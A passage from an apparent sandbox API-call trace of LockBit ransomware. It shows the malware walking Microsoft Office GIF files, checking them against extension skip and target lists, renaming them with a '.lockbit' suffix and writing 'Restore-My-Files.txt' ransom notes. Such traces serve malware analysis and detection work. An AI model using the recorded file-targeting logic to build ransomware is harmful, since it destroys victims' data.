"c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115865.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.052] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.052] malloc (_Size=0x40068) returned 0x3df0008 [0205.052] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=224) returned 1 [0205.052] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.054] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.058] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.058] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.058] free (_Block=0x1fa2ed8) [0205.058] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.058] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.058] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58fafc00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x58fafc00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115866.GIF", cAlternateFileName="")) returned 1 [0205.058] lstrcmpiW (lpString1=".", lpString2="J0115866.GIF") returned -1 [0205.058] lstrcmpiW (lpString1="..", lpString2="J0115866.GIF") returned -1 [0205.058] PathFindExtensionW (pszPath="J0115866.GIF") returned=".GIF" [0205.058] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.058] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.058] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.058] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.058] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.058] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.058] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.058] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.059] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.059] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.060] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115866.GIF") returned 1 [0205.060] lstrcmpiW (lpString1="ntldr", lpString2="J0115866.GIF") returned 1 [0205.060] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115866.GIF") returned 1 [0205.060] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115866.GIF") returned -1 [0205.060] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115866.GIF") returned -1 [0205.060] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115866.GIF") returned 1 [0205.060] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115866.GIF") returned -1 [0205.060] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.060] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF") returned=".GIF" [0205.060] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.060] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.060] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.060] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.060] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.060] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.060] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.061] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.061] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.061] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF.lockbit") returned 78 [0205.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115866.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.491] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.491] malloc (_Size=0x40068) returned 0x3df0008 [0205.491] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=224) returned 1 [0205.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.493] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.497] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.497] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.497] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.497] free (_Block=0x1fa2ed8) [0205.497] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.497] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.498] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58fafc00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x58fafc00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115867.GIF", cAlternateFileName="")) returned 1 [0205.498] lstrcmpiW (lpString1=".", lpString2="J0115867.GIF") returned -1 [0205.498] lstrcmpiW (lpString1="..", lpString2="J0115867.GIF") returned -1 [0205.498] PathFindExtensionW (pszPath="J0115867.GIF") returned=".GIF" [0205.498] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.498] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.498] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.499] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.499] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.499] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.499] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.499] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.499] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115867.GIF") returned 1 [0205.499] lstrcmpiW (lpString1="ntldr", lpString2="J0115867.GIF") returned 1 [0205.499] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115867.GIF") returned 1 [0205.499] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115867.GIF") returned -1 [0205.499] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115867.GIF") returned -1 [0205.499] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115867.GIF") returned 1 [0205.499] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115867.GIF") returned -1 [0205.499] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF") returned=".GIF" [0205.500] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.500] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.500] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.500] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF.lockbit") returned 78 [0205.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115867.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.502] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.502] malloc (_Size=0x40068) returned 0x3df0008 [0205.502] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=224) returned 1 [0205.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.503] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.506] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.506] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.506] free (_Block=0x1fa2ed8) [0205.506] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.506] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.506] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58fafc00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x58fafc00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115868.GIF", cAlternateFileName="")) returned 1 [0205.506] lstrcmpiW (lpString1=".", lpString2="J0115868.GIF") returned -1 [0205.506] lstrcmpiW (lpString1="..", lpString2="J0115868.GIF") returned -1 [0205.506] PathFindExtensionW (pszPath="J0115868.GIF") returned=".GIF" [0205.506] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.506] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.506] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.506] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.506] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".msu", 